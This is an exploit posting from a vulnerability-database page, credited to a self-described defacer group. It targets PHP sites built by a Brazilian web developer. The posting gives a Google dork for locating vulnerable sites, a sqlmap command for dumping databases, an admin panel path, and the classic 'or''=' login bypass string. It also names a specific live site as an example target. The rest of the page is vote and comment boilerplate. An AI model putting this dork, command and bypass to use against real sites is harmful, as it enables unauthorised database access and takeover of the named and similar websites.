Desenvolvido por Hanger SQL injection

2016.08.21

S3N4T0R (AZ)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:.php?id= intext:Desenvolvido por Haniger

#########################################################################################
# Exploit Title : Desenvolvido por Hanger SQL injection & admin panel bypass
# Google Dork : inurl:.php?id= intext:Desenvolvido por Haniger
# Discovered By : S3N4T0R
# Contact Me : facebook/mk4y3l
#we are : Azerbaijan Defacers Group - S4RC4SM : S3N4T0R :Region20 : Dervish : P4TR!07 : BlacKBlooD
# Date : 21.08.2016
# Vendor Homepage : http://haniger.com.br/
##########################################################################################

+ Exploit : 

- sqlmap -u ourtarget --dbs 

+ Admin Panel :

- Site.com/admin/

+ Information

- Please watch the video : https://www.youtube.com/watch?v=09IntzzCqZY 

+ Example : 

- http://www.imoveiskruger.com.br/imovel.php?id=17

- admin panel Bypass 'or''=' (login, password)

References:

https://www.youtube.com/watch?v=09IntzzCqZY

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Desenvolvido por Hanger SQL injection

Dork: inurl:.php?id= intext:Desenvolvido por Haniger

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.